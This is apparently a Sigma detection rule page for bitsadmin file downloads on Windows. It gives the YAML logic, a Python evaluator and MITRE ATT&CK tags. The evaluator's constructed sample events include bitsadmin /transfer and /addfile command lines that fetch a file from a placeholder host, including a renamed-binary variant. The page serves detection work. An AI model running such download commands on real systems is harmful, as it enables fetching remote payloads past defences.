Type: Detection | Level: medium | Status: test

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

Authors: Michael Haag, FPT.EagleEye
Created: Thu Mar 09 | Updated: Wed Feb 15
Rule ID: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
Product: windows

Log Source
Product: Windows (raw: windows)
Category: Process Creation (raw: process_creation)

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic (4 selectors)
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_cmd:
        CommandLine|contains: ' /transfer '
    selection_cli_1:
        CommandLine|contains:
            - ' /create '
            - ' /addfile '
    selection_cli_2:
        CommandLine|contains: 'http'
    condition: selection_img and (selection_cmd or all of selection_cli_*)
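The detection block above, evaluated in Python against a handful of constructed process-creation events so the condition `selection_img and (selection_cmd or all of selection_cli_*)` can be read as code. This is an added example, not code from the Sigma project or the rule's authors. It assumes the Sigma process_creation field names (Image, OriginalFileName, CommandLine), the default case-insensitive matching of Sigma string modifiers, and no wildcard handling; the sample events, hostnames and paths are constructed.

```python
"""Reference evaluation of the 'File Download Via Bitsadmin' Sigma logic.

Assumptions (not from the rule page): events are dicts keyed by the Sigma
process_creation field names, and string matching is case-insensitive,
which is the Sigma default for |contains and |endswith.
"""

def _endswith(value, suffix):
    # Sigma |endswith, case-insensitive; a missing field never matches.
    return value is not None and value.lower().endswith(suffix.lower())

def _contains(value, needle):
    # Sigma |contains, case-insensitive; a missing field never matches.
    return value is not None and needle.lower() in value.lower()

def selection_img(ev):
    # A list of maps under a selection is an OR of the maps.
    return (_endswith(ev.get("Image"), r"\bitsadmin.exe")
            or (ev.get("OriginalFileName") or "").lower() == "bitsadmin.exe")

def selection_cmd(ev):
    # Note the surrounding spaces: ' /transfer ' must be a whole argument.
    return _contains(ev.get("CommandLine"), " /transfer ")

def selection_cli_1(ev):
    # A list of values under one field is an OR of the values.
    return any(_contains(ev.get("CommandLine"), v) for v in (" /create ", " /addfile "))

def selection_cli_2(ev):
    return _contains(ev.get("CommandLine"), "http")

def matches(ev):
    # condition: selection_img and (selection_cmd or all of selection_cli_*)
    # 'all of selection_cli_*' expands to selection_cli_1 AND selection_cli_2.
    return selection_img(ev) and (
        selection_cmd(ev) or (selection_cli_1(ev) and selection_cli_2(ev))
    )

# Constructed sample events (not real telemetry). Hostnames use the
# reserved .invalid TLD so nothing here resolves.
SAMPLE_EVENTS = {
    "transfer": {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer dl_job http://files.example.invalid/update.bin C:\Users\Public\update.bin",
    },
    # /create alone carries no URL, so selection_cli_2 fails on this event.
    "create_only": {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin.exe /create dl_job",
    },
    # The follow-up /addfile event is where the URL appears and the rule fires.
    "addfile": {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /addfile dl_job http://files.example.invalid/update.bin C:\Users\Public\update.bin",
    },
    # Benign administrative use: no transfer, create or addfile verb.
    "list": {
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin.exe /list /allusers",
    },
    # Renamed copy: Image no longer ends with \bitsadmin.exe, but the
    # PE OriginalFileName still identifies the binary.
    "renamed": {
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"svc.exe /transfer j http://files.example.invalid/p.txt C:\Users\Public\p.txt",
    },
    # A different downloader is out of scope for this rule.
    "curl": {
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe -o out.bin http://files.example.invalid/out.bin",
    },
}

def evaluate(events):
    """Return {event name: bool} for every event in the mapping."""
    return {name: matches(ev) for name, ev in events.items()}

if __name__ == "__main__":
    for name, hit in evaluate(SAMPLE_EVENTS).items():
        print(f"{name:12s} {'MATCH' if hit else '-'}")
```

Two points worth noticing from the samples: a job built with separate `/create` and `/addfile` invocations only triggers on the event that carries the URL, so the two process-creation events should be correlated by job name during triage; and the `OriginalFileName` branch of `selection_img` is what keeps the rule working when the binary has been copied under another name.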
False Positives

Some legitimate applications use bitsadmin this way, but only a limited number of them.

Testing & Validation

Simulations

Atomic Red Team, T1105

Windows - BITSAdmin BITS Download

GUID: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

Regression Tests

Contributed by Swachchhanda Shrawan Poudel (Nextron Systems)
Positive Detection Test: 1 match (evtx, Microsoft-Windows-Sysmon)

Rule Metadata
Rule ID
d059842b-6b9d-4ed1-b5c3-5b89143c6ede
Status
test
Level
medium
Type
Detection
Created
Thu Mar 09
Modified
Wed Feb 15
Path
rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
Raw Tags
attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003, attack.command-and-control, attack.t1105